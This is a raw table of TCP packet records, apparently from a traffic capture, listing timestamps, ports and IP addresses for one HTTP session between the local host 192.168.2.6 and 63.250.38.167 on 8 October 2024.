Oct 8, 2024 11:30:05.492403984 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.492456913 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.492490053 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.492522955 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.492937088 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.493005037 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.493012905 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.493077993 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.493113041 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.493145943 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.493156910 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.493200064 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.507658005 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.507853031 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.507901907 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.507936001 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.507966995 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.507977962 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.507977962 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.508002043 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.508035898 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.508069992 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.508070946 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.508121967 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.508141041 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.508153915 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.508188009 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.508222103 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.508223057 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.508353949 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.509058952 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.509108067 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.509143114 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.509175062 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.509188890 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.509243965 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.509464025 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.509514093 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.509547949 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.509579897 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.509613991 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.509629965 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.509629965 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.509645939 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.509680033 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.509706974 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.510436058 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.510499001 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.510524035 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.510533094 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.510565996 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.510587931 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.510597944 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.510632038 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.510684967 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.513056040 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.513108015 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.513150930 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.513168097 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.513202906 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.513236046 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.513245106 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.513268948 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.513294935 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.513303041 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.513369083 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.513505936 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.513571978 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.513622999 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.513714075 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.513761997 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.513813972 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.513843060 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.513844967 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.513879061 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.513911963 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.513945103 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.513962030 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.513962030 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.514811993 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.514844894 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.514878035 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.514879942 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.514910936 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.514945030 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.514949083 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.514976025 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.514988899 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.515010118 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.515109062 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.515639067 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.515697002 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.515712976 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.515728951 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.515750885 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.515764952 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.515764952 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.515764952 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.515780926 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.515815020 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.516586065 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.516660929 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.516683102 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.559839964 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.579679966 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.579757929 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.579812050 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.579866886 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.579868078 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.579904079 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.579937935 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.579972029 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.579993963 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.579993963 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.580003977 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.580041885 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.580063105 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.580075026 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.580108881 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.580142975 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.580173016 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.580177069 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.580197096 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.580209970 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.580241919 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.580261946 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.580277920 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.580312014 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.580332041 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.580343962 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.580378056 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.580398083 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.580411911 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.580446959 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.580472946 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.580482960 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.580535889 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.580569029 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.580636024 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.580668926 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.580713034 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.580715895 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.580744982 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.580775976 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.580810070 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.580863953 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.580899000 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.580930948 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.580941916 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.580941916 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.580967903 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.581068993 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.581145048 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.581177950 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.581228971 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.581229925 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.581262112 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.581295967 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.581321955 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.596872091 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.596898079 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.596915007 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.596930981 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.596947908 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.596962929 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.596988916 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.597004890 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.597007036 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.597022057 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.597038031 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.597048998 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.597048998 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.597054005 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.597069025 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.597074986 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.597085953 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.597100973 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.597115993 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.597117901 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.597134113 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.597158909 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.597162008 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.597162008 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.597173929 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.597189903 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.597232103 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.597232103 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.597604990 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.597640038 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.597673893 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.597701073 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.597707987 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.597754955 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.597760916 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.597806931 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.597841024 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.597873926 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.597892046 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.597928047 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.597949982 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.597964048 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.598016024 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.598125935 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.598161936 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.598212004 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.598262072 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.598295927 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.598313093 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.598313093 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.598331928 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.598365068 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.598397970 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.598433018 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.598447084 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.598447084 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.598463058 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.598499060 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.598586082 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.598619938 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.598730087 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.601548910 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.601602077 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.601638079 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.601691008 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.601746082 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.601778984 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.601799011 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.601830006 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.601864100 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.601881981 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.601901054 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.601928949 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.601985931 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.602507114 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.602540016 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.602596045 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.602607965 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.602627993 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.602679968 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.602686882 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.602730989 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.602750063 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.602766037 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.602799892 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.602821112 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.602834940 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.602866888 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.602886915 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.602901936 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.602935076 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.602961063 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.602968931 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.603008986 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.603043079 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.603044987 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.603079081 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.603101969 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.603131056 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.603163958 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.603188992 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.603214979 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.603249073 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.603281975 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.603288889 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.603315115 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.603348970 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.603355885 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.603401899 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.603404999 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.603442907 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.603477001 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.603518963 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.653598070 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.668216944 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.668262005 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.668317080 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.668353081 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.668378115 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.668396950 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.668405056 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.668441057 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.668486118 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.668490887 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.668543100 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.668576002 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.668596029 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.668608904 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.668642998 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.668659925 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.668683052 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.668735027 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.668735981 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.668770075 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.668817043 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.668819904 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.668869972 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.668904066 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.668919086 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.668939114 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.668972969 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.669006109 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.669020891 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.669042110 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.669055939 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.669076920 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.669110060 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.669125080 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.669143915 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.669258118 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.669270039 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.669292927 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.669327021 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.669337988 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.669362068 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.669394970 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.669404030 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.669429064 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.669461966 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.669471025 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.669495106 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.669528961 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.669539928 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.669564009 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.669600964 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.669611931 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.685246944 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.685281038 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.685314894 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.685339928 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.685353041 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.685372114 CEST	49710	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:05.685390949 CEST	80	49710	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:05.685439110 CEST	49710	80	192.168.2.6	63.250.38.167
